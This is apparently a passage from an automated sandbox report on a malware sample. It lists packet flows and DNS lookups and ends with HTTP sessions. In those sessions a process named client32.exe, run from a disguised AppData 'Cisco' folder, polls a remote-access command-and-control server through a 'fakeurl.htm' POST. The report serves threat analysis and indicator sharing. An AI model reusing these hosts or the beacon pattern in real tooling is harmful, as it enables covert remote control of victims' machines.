                                                                                                                                                                                                  Oct 31, 2024 18:05:27.050609112 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.050609112 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.050657034 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.050678015 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.050678015 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.061561108 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.061640024 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.061774015 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.061774969 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.061825037 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.061909914 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.062881947 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.062922001 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.063087940 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.063133001 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.063149929 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.063149929 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.063242912 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.066298008 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.066351891 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.066484928 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.066484928 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.066536903 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.066562891 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.066564083 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.066613913 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.069350004 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.069396019 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.069590092 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.069590092 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.069638968 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.069659948 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.069751978 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.073822021 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.073875904 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.074001074 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.074001074 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.074055910 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.074079037 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.074079037 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.074131966 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.077537060 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.077581882 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.077775002 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.077775002 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.077826023 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.077843904 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.091727018 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.091783047 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.092082024 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.092082024 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.092132092 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.105467081 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.105509996 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.105737925 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.105737925 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.105789900 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.105808020 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.105808020 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.107901096 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.107968092 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.108110905 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.108150005 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.108181953 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.117363930 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.117408991 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.117590904 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.117590904 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.117641926 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.117661953 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.117661953 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.162486076 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.162499905 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.162688971 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.162688971 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.162702084 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.162713051 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.162796021 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.162899017 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.166301966 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.166311026 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.166502953 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.166502953 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.166513920 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.166520119 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.166520119 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.166604042 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.210009098 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.212830067 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.212842941 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.213028908 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.213028908 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.213052034 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.213062048 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.213129044 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.213275909 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.220150948 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.220170021 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.220345974 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.220345974 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.220367908 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.220380068 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.220380068 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.220592976 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.221085072 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.221102953 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.221415043 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.221432924 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.221604109 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.225224018 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.225251913 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.225430012 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.225430012 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.225452900 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.225461960 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.225527048 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.225646973 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.230267048 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.230285883 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.230463982 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.230463982 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.230488062 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.230488062 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.230498075 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.230561972 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.230706930 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.236072063 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.236090899 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.236270905 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.236270905 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.236293077 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.236303091 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.236368895 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.236479044 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.236557961 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.237008095 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.237027884 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.237195015 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.237195015 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.237210989 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.237301111 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.237389088 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.244988918 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.245007992 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.245173931 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.245173931 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.245203018 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.245213985 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.245273113 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.245384932 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.245965958 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.245984077 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.246175051 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.246175051 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.246196032 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.246207952 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.246207952 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.246459961 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.247214079 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.247234106 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.247430086 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.247430086 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.247450113 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.247462988 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.247462988 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.247765064 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.261574030 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.261631012 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.261825085 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.261825085 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.261825085 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.261889935 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.261910915 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.262120962 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.275249958 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.275306940 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.275599957 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.275599957 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.275599957 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.275659084 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.275866032 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.278459072 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.278513908 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.278687000 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.278687000 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.278687000 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.278752089 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.278786898 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.278786898 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.279063940 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.279664040 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.279716969 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.279875040 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.279875040 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.279875040 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.279941082 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.279982090 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.279983044 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.280162096 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.320724964 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.320738077 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.320947886 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.320947886 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.320947886 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.320947886 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.320966005 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.321017027 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.321058035 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.321166992 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.321166992 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.322563887 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:27.322577953 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:57.476902962 CET49756443192.168.11.20151.236.16.15
                                                                                                                                                                                                  Oct 31, 2024 18:05:57.476921082 CET44349756151.236.16.15192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:57.477127075 CET49756443192.168.11.20151.236.16.15
                                                                                                                                                                                                  Oct 31, 2024 18:05:57.515747070 CET4975780192.168.11.20172.67.68.212
                                                                                                                                                                                                  Oct 31, 2024 18:05:57.538871050 CET49756443192.168.11.20151.236.16.15
                                                                                                                                                                                                  Oct 31, 2024 18:05:57.538881063 CET44349756151.236.16.15192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:57.538958073 CET44349756151.236.16.15192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:57.610945940 CET8049757172.67.68.212192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:57.611099005 CET4975780192.168.11.20172.67.68.212
                                                                                                                                                                                                  Oct 31, 2024 18:05:57.611530066 CET4975780192.168.11.20172.67.68.212
                                                                                                                                                                                                  Oct 31, 2024 18:05:57.705828905 CET8049757172.67.68.212192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:57.726877928 CET49758443192.168.11.20199.188.200.195
                                                                                                                                                                                                  Oct 31, 2024 18:05:57.726897001 CET44349758199.188.200.195192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:57.727108002 CET49758443192.168.11.20199.188.200.195
                                                                                                                                                                                                  Oct 31, 2024 18:05:57.784583092 CET49758443192.168.11.20199.188.200.195
                                                                                                                                                                                                  Oct 31, 2024 18:05:57.784595013 CET44349758199.188.200.195192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:57.784641027 CET44349758199.188.200.195192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:58.008657932 CET8049757172.67.68.212192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:58.008810997 CET4975780192.168.11.20172.67.68.212
                                                                                                                                                                                                  Oct 31, 2024 18:05:58.008858919 CET8049757172.67.68.212192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:58.009099960 CET4975780192.168.11.20172.67.68.212
                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                  Oct 31, 2024 18:05:20.343585968 CET4983353192.168.11.201.1.1.1
                                                                                                                                                                                                  Oct 31, 2024 18:05:20.745665073 CET53498331.1.1.1192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:57.231923103 CET5222653192.168.11.201.1.1.1
                                                                                                                                                                                                  Oct 31, 2024 18:05:57.307862997 CET6074353192.168.11.201.1.1.1
                                                                                                                                                                                                  Oct 31, 2024 18:05:57.406302929 CET53607431.1.1.1192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:57.475791931 CET53522261.1.1.1192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:57.539499998 CET5950953192.168.11.201.1.1.1
                                                                                                                                                                                                  Oct 31, 2024 18:05:57.726360083 CET53595091.1.1.1192.168.11.20
                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                  Oct 31, 2024 18:05:20.343585968 CET192.168.11.201.1.1.10x56f9Standard query (0)asknetsupertech.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                  Oct 31, 2024 18:05:57.231923103 CET192.168.11.201.1.1.10xb5a7Standard query (0)payiki.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                  Oct 31, 2024 18:05:57.307862997 CET192.168.11.201.1.1.10x33baStandard query (0)geo.netsupportsoftware.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                  Oct 31, 2024 18:05:57.539499998 CET192.168.11.201.1.1.10xdc56Standard query (0)anyhowdo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                  Oct 31, 2024 18:05:20.745665073 CET1.1.1.1192.168.11.200x56f9No error (0)asknetsupertech.com54.37.62.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Oct 31, 2024 18:05:57.406302929 CET1.1.1.1192.168.11.200x33baNo error (0)geo.netsupportsoftware.com172.67.68.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Oct 31, 2024 18:05:57.406302929 CET1.1.1.1192.168.11.200x33baNo error (0)geo.netsupportsoftware.com104.26.1.231A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Oct 31, 2024 18:05:57.406302929 CET1.1.1.1192.168.11.200x33baNo error (0)geo.netsupportsoftware.com104.26.0.231A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Oct 31, 2024 18:05:57.475791931 CET1.1.1.1192.168.11.200xb5a7No error (0)payiki.com151.236.16.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                  Oct 31, 2024 18:05:57.726360083 CET1.1.1.1192.168.11.200xdc56No error (0)anyhowdo.com199.188.200.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                  • asknetsupertech.com
                                                                                                                                                                                                  • 151.236.16.15connection: keep-alivecmd=pollinfo=1ack=1
                                                                                                                                                                                                  • geo.netsupportsoftware.com
                                                                                                                                                                                                  • 199.188.200.195connection: keep-alivecmd=pollinfo=1ack=1
                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  0192.168.11.2049756151.236.16.154434288C:\Users\user\AppData\Roaming\Cisco\client32.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  Oct 31, 2024 18:05:57.538871050 CET218OUTPOST http://151.236.16.15/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 151.236.16.15Connection: Keep-AliveCMD=POLLINFO=1ACK=1
                                                                                                                                                                                                  Data Raw:
                                                                                                                                                                                                  Data Ascii:


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  1192.168.11.2049757172.67.68.212804288C:\Users\user\AppData\Roaming\Cisco\client32.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  Oct 31, 2024 18:05:57.611530066 CET118OUTGET /location/loca.asp HTTP/1.1
                                                                                                                                                                                                  Host: geo.netsupportsoftware.com
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                  Oct 31, 2024 18:05:58.008657932 CET783INHTTP/1.1 200 OK
                                                                                                                                                                                                  Date: Thu, 31 Oct 2024 17:05:57 GMT
                                                                                                                                                                                                  Content-Type: text/html; Charset=utf-8
                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                  CF-Ray: 8db53b9f6e5e4309-EWR
                                                                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                  Cache-Control: private
                                                                                                                                                                                                  Set-Cookie: ASPSESSIONIDCCBQAACB=FOGAGJHBOOILJHKIGGLPDOCO; path=/
                                                                                                                                                                                                  cf-apo-via: origin,host
                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                  X-Powered-By: ASP.NET
